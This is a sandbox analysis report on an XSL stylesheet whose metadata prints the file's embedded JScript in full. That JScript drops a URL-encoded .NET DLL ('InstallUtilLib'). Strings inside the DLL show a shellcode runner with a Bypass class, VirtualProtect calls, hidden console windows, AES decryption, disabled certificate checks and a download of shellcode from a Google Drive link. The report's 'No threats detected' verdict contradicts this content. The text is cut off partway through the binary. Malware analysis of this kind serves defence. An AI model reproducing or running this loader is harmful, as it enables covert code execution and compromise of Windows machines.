| File name: | 7e8576fb316dadbb96b84310d36f33fcd04fe136f8f957a3a07af24252f7f25f.xsl |
| Full analysis: | https://app.any.run/tasks/090c4748-12d7-4d3e-8123-6131f2077f9d |
| Verdict: | No threats detected |
| Analysis date: | November 01, 2019, 11:47:16 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Indicators: | |
| MIME: | text/xml |
| File info: | XML 1.0 document text (XSL stylesheet) |
| MD5: | B37506F934FBF8FB83C64D947CE9B123 |
| SHA1: | 36179BF307BC9DD4007B5309CC5453FABFD6EE97 |
| SHA256: | 7E8576FB316DADBB96B84310D36F33FCD04FE136F8F957A3A07AF24252F7F25F |
| SSDEEP: | 192:lLrNHLCkuSeCVxYAd4FBfB1R5ufsVc34YszEzbeIPuBVCVmdNnLBdkaR/y2jBj0D:lLrN7pjEi34YsuluVRnLMa8UJj0CGfDp |
| .xml | | | Generic XML (ASCII) (100) |
|---|
| StylesheetVersion: | 1 |
|---|---|
| StylesheetScriptLanguage: | JScript |
| StylesheetScriptImplements-prefix: | user |
| StylesheetScript: | function Logger(msg){ stdlibs.file.append("%LOCALAPPDATA%\\Temp\\logger.txt", msg+"\r\n"); } var stdlibs = {}; stdlibs.FS = new ActiveXObject("Scripting.FileSystemObject"); stdlibs.WS = new ActiveXObject("WScrip"+"t.Shell"); stdlibs.file = {}; stdlibs.file.getPath = function(path){ return stdlibs.WS.ExpandEnvironmentStrings(path); }; stdlibs.file.getWorkPath = function(){ return stdlibs.FS.GetAbsolutePathName("."); }; stdlibs.file.write = function(path, data){ var fd = stdlibs.FS.CreateTextFile(stdlibs.file.getPath(path), true); fd.write(data); fd.close(); }; stdlibs.file.append = function(path, data){ //ForReading=1; ForWriting=2; ForAppending=8 var fd = stdlibs.FS.OpenTextFile(stdlibs.file.getPath(path), 8, true); fd.write(data); fd.close(); }; stdlibs.file.exists = function(path){ if(stdlibs.FS.FileExists(path)){ return true; }else{ return false; } }; function WriteBinFile(){ var urlencode_data="MZ%90%00%03%00%00%00%04%00%00%00%FF%FF%00%00%B8%00%00%00%00%00%00%00@%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%u20AC%00%00%00%0E%1F%BA%0E%00%B4%09%CD%21%B8%01L%CD%21This%20program%20cannot%20be%20run%20in%20DOS%20mode.%0D%0D%0A%24%00%00%00%00%00%00%00PE%00%00L%01%03%00%C2%FC%81%5D%00%00%00%00%00%00%00%00%E0%00%02%21%0B%01%08%00%00%20%00%00%00%06%00%00%00%00%00%00%7E%3F%00%00%00%20%00%00%00@%00%00%00%00@%00%00%20%00%00%00%02%00%00%04%00%00%00%00%00%00%00%04%00%00%00%00%00%00%00%00%u20AC%00%00%00%02%00%00%21j%00%00%03%00@%u2026%00%00%10%00%00%10%00%00%00%00%10%00%00%10%00%00%00%00%00%00%10%00%00%00%00%00%00%00%00%00%00%00%24%3F%00%00W%00%00%00%00@%00%00%C0%02%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%00%00%0C%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%20%00%00%08%00%00%00%00%00%00%00%00%00%00%00%08%20%00%00H%00%00%00%00%00%00%00%00%00%00%00.text%00%00%00%u201E%1F%00%00%00%20%00%00%00%20%00%00%00%02%00%00%00%00%00%00%00%00%00%00%00%00%00%00%20%00%00%60.rsrc%00%00%00%C0%02%00%00%00@%00%00%00%04%00%00%00%22%00%00%00%00%00%00%00%00%00%00%00%00%00%00@%00%00@.reloc%00%00%0C%00%00%00%00%60%00%00%00%02%00%00%00%26%00%00%00%00%00%00%00%00%00%00%00%00%00%00@%00%00B%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%3F%00%00%00%00%00%00H%00%00%00%02%00%05%00x%26%00%00%AC%18%00%00%09%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00P%20%00%00%u20AC%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%u0152%1A.%00D%904%D0%3B%5E6d%8F%D00S6%E6%07%u2013%A9%FF%28J%BA%7E%u2018%09n%A8%D5%FB%D6x%A8GR0W%F4%u0161%u20AC%17%u017D%u2026p%FC%3F%u2014%01%u2014%u02C6%u01538%B3%ACP%u02C6%1B%B8%3A%7Bx2%A1%F7Z%10%B2%22%F0%E3%AAp%E4%B7%A4%16z%25-%E1%A9U%E8%C0%EE%0AuY%E8%F5%u0192%EE%3FV%u2013%CE4B%u203A%u201E%3B%E9*%DD%C1%22%1D%3Eb%C5%3E%E6%10@%27%u0160%CE%F6%u017E%7Ctrh%u0192%FD%0F%130%04%00F%00%00%00%01%00%00%11%00%02%19%28%06%00%00%0A%0D%12%03%28%07%00%00%0A%0A%16%0B%06%02%u017Di%28%08%00%00%0A%1F@%12%01%28%01%00%00%06%26%06%D0%04%00%00%02%28%09%00%00%0A%28%0A%00%00%0At%04%00%00%02%0C%08o%0A%00%00%06%26+%00*%00%00%130%02%00%19%00%00%00%02%00%00%11%00%02u%01%00%00%1B%0A%06%16%u0161u%02%00%00%1B%0B%07%28%02%00%00%06%00*%00%00%00%130%04%001%00%00%00%03%00%00%11%00%14%FE%06%03%00%00%06s%0B%00%00%0A%17%8D%01%00%00%01%0A%06%16%02%A2%06%28%0C%00%00%0A%26r%01%00%00p%28%0D%00%00%0A%00%28%0E%00%00%0A%26*V%02%28%11%00%00%0A%00%00r%1F%00%00p%28%0D%00%00%0A%00%00*z%00rO%00%00p%28%0D%00%00%0A%00%28%10%00%00%06%00r%81%00%00p%28%0D%00%00%0A%00*z%00r%B1%00%00p%28%0D%00%00%0A%00%28%10%00%00%06%00r%E7%00%00p%28%0D%00%00%0A%00*%00%00%00%1B0%05%00%DE%00%00%00%04%00%00%11%00%28%16%00%00%06%0A%06%16%28%17%00%00%06%26r%1B%01%00p%0Bru%01%00p%07%28%14%00%00%0A%0C%17%14s%15%00%00%0A%20%01%00%1F%00%16s%16%00%00%0A%13%04s%17%00%00%0A%13%05%11%05%11%04o%18%00%00%0A%00%16%08%12%03%11%05s%19%00%00%0A%13%06%00%16%13%07%00%00%11%06%20%E8%03%00%00%16o%1A%00%00%0A%13%07%11%07%13%08%11%08-%0E%00r%u201C%01%00p%28%0D%00%00%0A%00%DE%5E%00r%BD%01%00p%28%0D%00%00%0A%00%28%12%00%00%06%00%00%00%DE%08%26%00%17%13%07%00%DE%00%00%00%DE%23%00%11%07%16%FE%01%13%08%11%08-%15%00r%D7%01%00p%28%0D%00%00%0A%00%11%06o%1B%00%00%0A%00%00%00%DC%00%00%DE%14%11%06%14%FE%01%13%08%11%08-%08%11%06o%1C%00%00%0A%00%DC%00%00*%00%00%01%28%00%00%00%00X%00%3C%u201D%00%08*%00%00%01%02%00W%00I%A0%00%23%00%00%00%00%02%00S%00t%C7%00%14%00%00%00%00%1B0%02%00@%00%00%00%05%00%00%11%00r%F5%01%00p%0A++%00%00%02%03o%1D%00%00%0A%0A%06%28%1E%00%00%0A%0C%08-%03%00%DE%19%00%DE%0F%26%00%200u%00%00%28%1F%00%00%0A%00%DE%02%00%00%00%17%0C+%D0%00%06%0B+%00%07*%01%10%00%00%00%00%0A%00%19%23%00%0F%01%00%00%01%130%04%005%01%00%00%06%00%00%11%00%28%20%00%00%0A%14%FE%06%13%00%00%06s%21%00%00%0A%28%22%00%00%0At-%00%00%01%28%23%00%00%0A%00s%24%00%00%0A%0A%06%28%25%00%00%0Ao%26%00%00%0A%00%06o%27%00%00%0A%28%28%00%00%0Ao%29%00%00%0A%00r%F7%01%00p%28*%00%00%0A%0B%07%28+%00%00%0A%0C%08o%2C%00%00%0A%0DrQ%02%00p%09o-%00%00%0A%28%14%00%00%0A%13%04r%B7%02%00p%11%04%28.%00%00%0A%28%0D%00%00%0A%00%06%11%04%28%11%00%00%06o-%00%00%0A%13%05%28/%00%00%0A%1A%FE%01%16%FE%01%13%0B%11%0B-%04%00%00+%10%00%11%05r%1B%03%00p%28.%00%00%0A%13%05%00r%25%03%00p%11%05%28.%00%00%0A%28%0D%00%00%0A%00%06%11%05%28%11%00%00%06o-%00%00%0A%13%06%06o0%00%00%0Ar_%03%00po1%00%00%0Ao2%00%00%0A%13%07%283%00%00%0A%13%08%11%08%284%00%00%0A%11%07o5%00%00%0Ao6%00%00%0A%13%09%1F%10%8D%3C%00%00%01%13%0C%11%0C%13%0A%11%06%11%09%11%0A%28%18%00%00%06%13%06%11%06o-%00%00%0A%16%28%15%00%00%06%00+%00*%00%00%00%130%01%00%07%00%00%00%07%00%00%11%00%17%0A+%00%06*%00%130%04%00%B0%00%00%00%08%00%00%11%00%02ri%03%00pr%F5%01%00po7%00%00%0A%10%00ro%03%00ps8%00%00%0A%0A%06%02r%F5%01%00po9%00%00%0A%10%00%02o%3A%00%00%0A%18%5D%16%FE%01%13%05%11%05-%0Br%u2030%03%00ps%3B%00%00%0Az%02o%3A%00%00%0A%17c%8D%3C%00%00%01%0B%16%0C+%3D%00%02%08%17bo%3C%00%00%0A%13%06%12%06%28%3D%00%00%0A%02%08%17b%17Xo%3C%00%00%0A%13%06%12%06%28%3D%00%00%0A%28.%00%00%0A%0D%07%08%09%1F%10%28%3E%00%00%0A%u0153%00%08%17X%0C%08%02o%3A%00%00%0A%17c%FE%04%13%05%11%05-%B2%07%13%04+%00%11%04*%3A%00%02%28%14%00%00%06%28%04%00%00%06%00*%00%1B0%04%00%C1%00%00%00%09%00%00%11%00%14%0A%14%0B%00%02%28%3F%00%00%0A%0C%08s@%00%00%0A%0D%00sA%00%00%0A%0A%06%03oB%00%00%0A%00%06%04oC%00%00%0A%00%06%06oD%00%00%0A%06oE%00%00%0AoF%00%00%0A%13%04%09%11%04%16sG%00%00%0A%13%05%00%11%05sH%00%00%0A%13%06%11%06o%2C%00%00%0A%0B%DE%14%11%06%14%FE%01%13%08%11%08-%08%11%06o%1C%00%00%0A%00%DC%00%00%DE%14%11%05%14%FE%01%13%08%11%08-%08%11%05o%1C%00%00%0A%00%DC%00%00%DE%12%09%14%FE%01%13%08%11%08-%07%09o%1C%00%00%0A%00%DC%00%00%DE%14%00%06%14%FE%01%13%08%11%08-%07%06oI%00%00%0A%00%00%DC%00%07%13%07+%00%11%07*%00%00%00%014%00%00%02%00T%00%0A%5E%00%14%00%00%00%00%02%00J%00%2Cv%00%14%00%00%00%00%02%00%14%00z%u017D%00%12%00%00%00%00%02%00%05%00%u0178%A4%00%14%00%00%00%00BSJB%01%00%01%00%00%00%00%00%0C%00%00%00v2.0.50727%00%00%00%00%05%00l%00%00%00%00%07%00%00%23%7E%00%00l%07%00%00%F0%09%00%00%23Strings%00%00%00%00%5C%11%00%00%F0%03%00%00%23US%00L%15%00%00%10%00%00%00%23GUID%00%00%00%5C%15%00%00P%03%00%00%23Blob%00%00%00%00%00%00%00%02%00%00%01W%1D%02%1C%09%02%00%00%00%FA%013%00%16%00%00%01%00%00%00F%00%00%00%05%00%00%00%01%00%00%00%18%00%00%00%27%00%00%00I%00%00%00%01%00%00%00%07%00%00%00%09%00%00%00%02%00%00%00%02%00%00%00%03%00%00%00%01%00%00%00%03%00%00%00%02%00%00%00%00%00%0A%00%01%00%00%00%00%00%06%00l%00e%00%06%00s%00e%00%0A%00%u0178%00%u2026%00%06%00%E7%00e%00%06%00%F4%00e%00%0E%00R%01G%01%06%00%AD%01%7F%01%0E%00%BD%01%7F%01%0E%00%DB%01%C7%01%0A%00B%02%u2026%00%06%00%7B%02%5B%02%06%00%u203A%02%5B%02%06%00%D8%02%B9%02%06%00%25%03%B9%02%06%00%3C%03%B9%02%06%00E%03%B9%02%06%00%09%02e%00%06%00t%03e%00%06%00y%03e%00%06%00%9D%03%B9%02%06%00%A5%03e%00%06%00%E9%03%D8%03%06%00%F6%03%D8%03%06%00%13%04e%00%06%00%25%04e%00%06%00%3C%04%B9%02%06%00%5E%04%B9%02%06%00%u201D%04%B9%02%06%00%A2%04%B9%02%06%00%C3%04%B9%02%06%00%E2%04e%00%06%00%0A%05%F0%04%06%00%1D%05%F0%04%06%00L%05.%05%06%00%5C%05%F0%04%06%00n%05.%05%06%00z%05.%05%06%00%u0152%05.%05%06%00%A8%05%D8%03%06%00%AE%05%D8%03%06%00%CE%05e%00%06%00%E2%05%D8%03%06%00%1E%06%D8%03%0E%00+%06G%01%0E%00%3F%06%C7%01%0E%00%BB%06G%01%0E%00%C6%06G%01%0E%00%F6%06G%01%0E%00%06%07G%01%06%00%3A%07e%00%06%00k%07a%07%06%00p%07a%07%06%00%u2020%07a%07%06%00%A7%07e%00%0E%00%B7%07G%01%0E%00%FE%07%DF%07%06%00A%08%24%08%06%00%5B%08O%08%06%00w%08%24%08%06%00%u2018%08e%00%0E%00%E6%08%C7%08%06%00%F7%08e%00%06%00%0B%09e%00%06%00T%09a%07%06%00a%09%24%08%06%00q%09%24%08%06%00%A2%09%24%08%06%00%C3%09%24%08%06%00%D0%09a%07%06%00%D7%09%24%08%00%00%00%00%01%00%00%00%00%00%01%00%01%00%81%01%10%00%1D%002%00%05%00%01%00%01%00%02%01%00%00A%00%00%00%09%00%01%00%05%00%03%01%00%00I%00%00%00%09%00%01%00%09%00%01%00%10%00U%002%00%0D%00%01%00%0D%00Q%u20AC%18%01%5D%00%00%00%00%00%u20AC%00%u2018%20%B1%00%13%00%01%00%D0%20%00%00%00%00%u2013%00%C0%00%1C%00%05%00%24%21%00%00%00%00%u2013%00%C4%00%22%00%06%00L%21%00%00%00%00%u2013%00%CB%00%1C%00%07%00%00%00%00%00%03%00%u2020%18%DA%00%27%00%08%00%00%00%00%00%03%00%C6%01%E0%00-%00%0A%00%00%00%00%00%03%00%C6%01%02%015%00%0C%00%00%00%00%00%03%00%C6%01%0E%01A%00%10%00%00%00%00%00%03%00%u2020%18%DA%00%27%00%13%00%00%00%00%00%03%00%C6%01%E0%00K%00%15%00%00%00%00%00%03%00%C6%01%02%01O%00%15%00%00%00%00%00%03%00%C6%01%0E%01W%00%17%00%u2030%21%00%00%00%00%u2020%18%DA%00e%00%18%00%u0178%21%00%00%00%00%u2013%00%20%01i%00%18%00%BE%21%00%00%00%00%u2013%00.%01i%00%19%00%E0%21%00%00%00%00%u2013%00%3E%01n%00%1A%00%F4%22%00%00%00%00%u2013%00%5C%01r%00%1A%00P%23%00%00%00%00%u2013%00r%01n%00%1C%00%u201D%24%00%00%00%00%u2018%00%EB%01y%00%1C%00%A8%24%00%00%00%00%u2013%00%09%02%u201E%00%20%00d%25%00%00%00%00%u2013%00%11%02%u0160%00%21%00%00%00%00%00%u20AC%00%u2018%20%15%02%90%00%23%00%00%00%00%00%u20AC%00%u2018%20%26%02%u201D%00%23%00t%25%00%00%00%00%u2013%001%02%u0161%00%25%00%00%00%01%00%F8%02%00%00%02%00%02%03%00%00%03%00%09%03%02%00%04%00%16%03%00%00%01%002%03%00%00%01%00%CC%03%00%00%01%002%03%00%00%01%00p%04%00%00%02%00w%04%00%00%01%00%7E%04%00%00%02%00%81%04%00%00%01%00%7E%04%00%00%02%00%81%04%00%00%03%00%u201E%04%00%00%04%00p%04%00%00%01%00%7E%04%00%00%02%00%81%04%00%00%03%00%8D%04%00%00%01%00p%04%00%00%02%00w%04%00%00%01%00%u201E%04%00%00%02%00p%04%00%00%01%00%8D%04%00%00%01%00%BF%04%00%00%01%00%BF%04%00%00%01%00%FA%05%00%00%02%00%FD%05%00%00%01%00%u2013%08%00%00%02%00%9D%08%00%00%03%00%A9%08%00%00%04%00%AF%08%00%00%01%002%03%00%00%01%002%03%00%00%02%00%17%09%00%00%01%00%27%09%00%00%02%00%2C%09%00%00%01%005%09%00%00%02%00%BF%04%00%00%03%00@%09Q%00%DA%00%A3%00Y%00%DA%00%A8%00a%00%DA%00e%00i%00%DA%00%A3%00q%00%DA%00e%00y%00R%03O%01y%00X%03W%01%u2030%00k%03%5B%01%u2018%00%u2039%03%60%01%A1%00%AE%03g%01%B1%00%DA%00%27%00%B9%00%01%04%u2026%01%C1%00%1B%04i%00%C1%004%04%u0152%01%D1%00%DA%00%u2013%01%E1%00%DA%00%A3%00%19%00%DA%00e%00%E9%00%DA%00e%00%F1%00%DA%00e%00%F9%00%E9%04%D4%01%01%01%DA%00%DA%01%11%01%DA%00%E4%011%01%DA%00e%001%01%u0161%05%F1%019%01%DA%00%F8%01A%01%B9%05%03%029%01%C1%05e%00I%01%DA%05e%001%00%01%06%1B%02%F9%00%10%06%20%02Y%01%25%06%25%02a%01c%060%02i%01%DA%00%27%00%A9%00%u2039%066%02a%01%u201C%06%3F%021%00%DA%00e%00q%01%D0%06F%021%00%E2%06L%021%00%EC%06S%02%81%01%13%07Y%02y%01*%07_%02%u2018%01F%07f%02%u2122%01%7D%07k%02%A9%01%u2018%07r%02%F9%00%u203A%07r%02%F9%00%A0%07v%02%B1%01%AE%07%7C%021%00%CB%07%u20AC%02%C1%01%12%08%1B%02%09%00%1B%08r%02%C9%01H%08%u2020%02%D1%01d%08%u0152%02%D1%01n%08%u2019%02%D9%01%u2026%08%u02DC%02%F9%00%BF%08%BB%02%E9%01%DA%00%A3%00%E9%01%BF%08%BB%02%F9%00%EC%08K%00%F1%01%DA%00%A3%00%F9%00%01%09%C1%02%F9%01%1B%08r%02%u2030%00%10%09%C6%02%u2030%00C%09%u201E%00%01%02%DA%00%DA%02%09%02%DA%00e%00%11%02%u201E%09%DA%02%11%02%u0152%09%DA%02%11%02%u201C%09%E0%02%11%02%u203A%09%E0%02%11%02%B3%09%E5%02%21%02%DA%00%EF%02%A1%01%DA%00%FC%02%11%02%E8%09e%00%08%00%04%00%60%00.%00%13%00%28%03.%00%1B%001%03.%00%0B%00%1A%03c%00%7B%00%u0153%01%A3%00%u0192%00%A5%01%C0%01%u201C%00%CF%01%E0%01%u203A%00%CF%01o%01%7E%01%u2018%01%09%02*%02%u0178%02%B7%02%CC%02%03%03%EB%02%1C%09x%01%7B%01%00%01%03%00%B1%00%01%00%00%01-%00%15%02%01%00%00%01/%00%26%02%02%00%04%u20AC%00%00%00%00%00%00%00%00%00%00%01%00%00%00%AD%002%00%00%00%02%00%00%00%00%00%00%00%00%00%00%00%01%00%5C%00%00%00%00%00%02%00%00%00%00%00%00%00%00%00%00%00%0A%00%u2026%00%00%00%00%00%02%00%00%00%00%00%00%00%00%00%00%00%01%00e%00%00%00%00%00%03%00%02%00%04%00%02%00%00%00%00%3CModule%3E%00InstallUtilLib.dll%00GCHandleRunShellcode%00InstallUtilLib%00__cpuid%00IntReturner%00Bypass%00mscorlib%00System%00Object%00MulticastDelegate%00System.EnterpriseServices%00ServicedComponent%00VirtualProtect%00run%00Worker%00run_via_thread%00.ctor%00Invoke%00IAsyncResult%00AsyncCallback%00BeginInvoke%00EndInvoke%00SW_HIDE%00RegisterClass%00UnRegisterClass%00MainProc%00System.Net%00WebClient%00DownloadStringRequest%00StartProcess%00System.Security.Cryptography.X509Certificates%00X509Certificate%00X509Chain%00System.Net.Security%00SslPolicyErrors%00CertificateValidationCallBack%00Convert%00Run%00GetConsoleWindow%00ShowWindow%00DecryptStringAES%00ApplicationNameAttribute%00System.Runtime.CompilerServices%00CompilationRelaxationsAttribute%00RuntimeCompatibilityAttribute%00System.Runtime.InteropServices%00DllImportAttribute%00kernel32.dll%00lpAddress%00dwSize%00flNewProtect%00lpflOldProtect%00OutAttribute%00shellcode%00GCHandle%00GCHandleType%00Alloc%00AddrOfPinnedObject%00ToUInt32%00Type%00RuntimeTypeHandle%00GetTypeFromHandle%00Marshal%00Delegate%00GetDelegateForFunctionPointer%00thread_args%00System.Threading%00WaitCallback%00ThreadPool%00QueueUserWorkItem%00Console%00WriteLine%00ConsoleKeyInfo%00ReadKey%00UnmanagedFunctionPointerAttribute%00CallingConvention%00object%00method%00s1%00s2%00callback%00result%00GuidAttribute%00ComRegisterFunctionAttribute%00key%00ComUnregisterFunctionAttribute%00String%00Format%00System.Security.Principal%00SecurityIdentifier%00WellKnownSidType%00System.Security.AccessControl%00MutexAccessRule%00IdentityReference%00MutexRights%00AccessControlType%00MutexSecurity%00AddAccessRule%00Mutex%00WaitHandle%00WaitOne%00ReleaseMutex%00IDisposable%00Dispose%00AbandonedMutexException%00wc%00url%00DownloadString%00IsNullOrEmpty%00Thread%00Sleep%00ServicePointManager%00RemoteCertificateValidationCallback%00get_ServerCertificateValidationCallback%00Combine%00set_ServerCertificateValidationCallback%00WebRequest%00IWebProxy%00GetSystemWebProxy%00set_Proxy%00get_Proxy%00CredentialCache%00ICredentials%00get_DefaultCredentials%00set_Credentials%00Environment%00ExpandEnvironmentVariables%00System.IO%00File%00StreamReader%00OpenText%00TextReader%00ReadToEnd%00Trim%00Concat%00IntPtr%00get_Size%00WebHeaderCollection%00get_ResponseHeaders%00System.Collections.Specialized%00NameValueCollection%00get_Item%00ToString%00System.Security.Cryptography%00SHA256%00Create%00System.Text%00Encoding%00get_ASCII%00GetBytes%00HashAlgorithm%00ComputeHash%00Byte%00sender%00certificate%00chain%00sslPolicyErrors%00Replace%00System.Text.RegularExpressions%00Regex%00get_Length%00Exception%00get_Chars%00Char%00ToByte%00fork%00user32.dll%00hWnd%00nCmdShow%00cipherText%00iv%00FromBase64String%00MemoryStream%00RijndaelManaged%00SymmetricAlgorithm%00set_Key%00set_IV%00get_Key%00get_IV%00ICryptoTransform%00CreateDecryptor%00CryptoStream%00Stream%00CryptoStreamMode%00Clear%00%00%00%00%1DS%00h%00e%00l%00l%00C%00o%00d%00e%00%20%00R%00u%00n%00%21%00%00/I%00%20%00a%00m%00%20%00a%00%20%00b%00a%00s%00i%00c%00%20%00C%00O%00M%00%20%00O%00b%00j%00e%00c%00t%00%001H%00e%00y%00%20%00F%00r%00o%00m%00%20%00R%00e%00g%00i%00s%00t%00e%00r%00%20%00S%00t%00a%00r%00t%00%21%00%00/H%00e%00y%00%20%00F%00r%00o%00m%00%20%00R%00e%00g%00i%00s%00t%00e%00r%00%20%00D%00o%00n%00e%00%21%00%005H%00e%00y%00%20%00F%00r%00o%00m%00%20%00U%00n%00R%00e%00g%00i%00s%00t%00e%00r%00%20%00S%00t%00a%00r%00t%00%21%00%003H%00e%00y%00%20%00F%00r%00o%00m%00%20%00U%00n%00R%00e%00g%00i%00s%00t%00e%00r%00%20%00D%00o%00n%00e%00%21%00%00YI%00n%00s%00t%00a%00l%00l%00U%00t%00i%00l%00_%00d%007%00f%009%00e%007%006%00d%005%001%000%00a%003%000%007%00b%005%00f%009%003%00c%00f%008%00d%008%00f%00b%00c%00d%008%007%003%00%00%1DG%00l%00o%00b%00a%00l%00%5C%00%7B%00%7B%00%7B%000%00%7D%00%7D%00%7D%00%00%29A%00p%00p%00%20%00A%00l%00r%00e%00a%00d%00y%00%20%00R%00u%00n%00n%00i%00n%00g%00%21%00%00%19A%00p%00p%00%20%00R%00u%00n%00n%00i%00n%00g%00%21%00%00%1DR%00e%00l%00e%00a%00s%00e%00%20%00M%00u%00t%00e%00x%00%21%00%00%01%00Y%25%00S%00y%00s%00t%00e%00m%00D%00r%00i%00v%00e%00%25%00%5C%00P%00r%00o%00g%00r%00a%00m%00D%00a%00t%00a%00%5C%00I%00n%00s%00t%00a%00l%00l%00U%00t%00i%00l%00L%00i%00b%00.%00i%00n%00i%00%00eh%00t%00t%00p%00s%00%3A%00/%00/%00d%00r%00i%00v%00e%00.%00g%00o%00o%00g%00l%00e%00.%00c%00o%00m%00/%00u%00c%00%3F%00e%00x%00p%00o%00r%00t%00%3D%00d%00o%00w%00n%00l%00o%00a%00d%00%26%00i%00d%00%3D%00%7B%000%00%7D%00%00cD%00o%00w%00n%00l%00o%00a%00d%00%20%00T%00h%00e%00%20%00S%00h%00e%00l%00l%00C%00o%00d%00e%00%20%00U%00r%00l%00%20%00F%00r%00o%00m%00%20%00G%00o%00o%00g%00l%00e%00%20%00D%00r%00i%00v%00e%00%21%00%20%00-%00%3E%00%20%00%01%09%3F%00t%00%3D%001%00%009D%00o%00w%00n%00l%00o%00a%00d%00%20%00T%00h%00e%00%20%00S%00h%00e%00l%00l%00C%00o%00d%00e%00%20%00F%00r%00o%00m%00%20%00%00%09D%00a%00t%00e%00%00%050%00x%00%00%19%5B%00%5E%00a%00-%00f%00A%00-%00F%000%00-%009%00%5D%00%01cS%00h%00e%00l%00l%00c%00o%00d%00e%00%20%00l%00e%00n%00g%00t%00h%00%20%00i%00s%00%20%00o%00d%00d%00%20%00n%00u%00m%00b%00e%00r%00%20%00o%00f%00%20%00h%00e%00x%00%20%00c%00h%00a%00r%00a%00c%00t%00e%00r%00s%00.%00%00%00%00%00%2C%F2%D3%FDb%FD%1F@%B6%C0%25%0CN%5C%u2019%05%00%08%B7z%5CV%194%E0%u2030%08%B0%3F_%7F%11%D5%0A%3A%08%00%04%02%18%09%09%10%09%05%00%01%01%1D%05%04%00%01%01%1C%05%20%02%01%1C%18%07%20%02%08%10%08%10%08%0B%20%04%12%11%10%08%10%08%12%15%1C%09%20%03%08%10%08%10%08%12%11%03%20%00%08%07%20%02%12%11%12%15%1C%05%20%01%08%12%11%02%06%08%04%00%00%00%00%03%20%00%01%04%00%01%01%0E%03%00%00%01%06%00%02%0E%12%19%0E%0A%00%04%02%1C%12%1D%12%21%11%25%05%00%01%1D%05%0E%05%00%02%01%0E%02%03%00%00%18%05%00%02%02%18%08%08%00%03%0E%0E%1D%05%1D%05%04%20%01%01%0E%04%20%01%01%08%u20AC%A0%00%24%00%00%04%u20AC%00%00%u201D%00%00%00%06%02%00%00%00%24%00%00RSA1%00%04%00%00%01%00%01%00%21%EByW%B0%A9%u2019%9D%E2%05%3B%u2013%CF%E9%D0%7D%04%05%C5%3D%u20AC%14%u201D4%u2022rg%u2026W%3C%266W%FEc%FADh%11%F3%3BM%26%8FR%18H%15%3E%5C/C%1F%u203A%u0153%E7%D2%2C%2C%22%AAKN%0F%22%1BP%u201E%D6%F4a%01*%15z%1D%AE%F9%5Evt%3C%7D%D9%0B%AEk9hB%7F%u02C6.%u2039%u2013%3C%A5%CF%C8%u201C%E1%FA%AAv%u201E%u201A%18%F356%E7%u0160-%B0%D7%27%C4%FAq%C0%F5%BE%A1%7C%A6%F9c%A0%07%00%02%11%3D%1C%11A%03%20%00%18%04%00%01%09%08%06%00%01%12I%11M%07%00%02%12U%18%12I%08%07%04%18%09%12%10%11%3D%02%1D%1C%02%1D%05%06%07%02%1D%1C%1D%05%06%00%02%02%12Y%1C%04%00%00%11e%04%07%01%1D%1C%05%20%01%01%11m%08%01%00%02%00%00%00%00%00%29%01%00%244fb2d46f-efc8-4643-bcd0-6e5bfa6a174c%00%00%04%01%00%00%00%05%00%02%0E%0E%1C%09%20%02%01%11%u20AC%u2026%12%u20AC%81%0C%20%03%01%12%u20AC%8D%11%u20AC%u2018%11%u20AC%u2022%06%20%01%01%12%u20AC%u2030%0A%20%04%01%02%0E%10%02%12%u20AC%u2122%05%20%02%02%08%02%11%07%09%18%0E%0E%02%12%u20AC%u2030%12%u20AC%u2122%12%u20AC%9D%02%02%04%20%01%0E%0E%04%00%01%02%0E%04%00%01%01%08%05%07%03%0E%0E%02%05%00%00%12%u20AC%B5%08%00%02%12U%12U%12U%06%00%01%01%12%u20AC%B5%05%00%00%12%u20AC%BD%06%20%01%01%12%u20AC%BD%05%20%00%12%u20AC%BD%05%00%00%12%u20AC%C5%06%20%01%01%12%u20AC%C5%04%00%01%0E%0E%06%00%01%12%u20AC%D1%0E%03%20%00%0E%05%00%02%0E%0E%0E%03%00%00%08%05%20%00%12%u20AC%DD%05%00%00%12%u20AC%E5%05%00%00%12%u20AC%E9%05%20%01%1D%05%0E%06%20%01%1D%05%1D%05%17%07%0D%12%19%0E%12%u20AC%D1%0E%0E%0E%0E%0E%12%u20AC%E5%1D%05%1D%05%02%1D%05%03%07%01%02%05%20%02%0E%0E%0E%04%20%01%03%08%05%00%02%05%0E%08%0D%07%07%12%u20AC%F5%1D%05%08%0E%1D%05%02%03%05%20%01%01%1D%05%04%20%00%1D%05%09%20%02%12%81%0D%1D%05%1D%05%0C%20%03%01%12%81%15%12%81%0D%11%81%19%06%20%01%01%12%81%15%16%07%09%12%81%05%0E%1D%05%12%81%01%12%81%0D%12%81%11%12%u20AC%D1%0E%02%0D%01%00%08BoomTown%00%00%08%01%00%08%00%00%00%00%00%1E%01%00%01%00T%02%16WrapNonExceptionThrows%01L%3F%00%00%00%00%00%00%00%00%00%00n%3F%00%00%00%20%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%60%3F%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00_CorDllMain%00mscoree.dll%00%00%00%00%00%FF%25%00%20@%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%10%00%00%00%18%00%00%u20AC%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%01%00%00%000%00%00%u20AC%00%00%00%00%00%00%00%00%00%00%00%00%00%00%01%00%00%00%00%00H%00%00%00X@%00%00d%02%00%00%00%00%00%00%00%00%00%00d%024%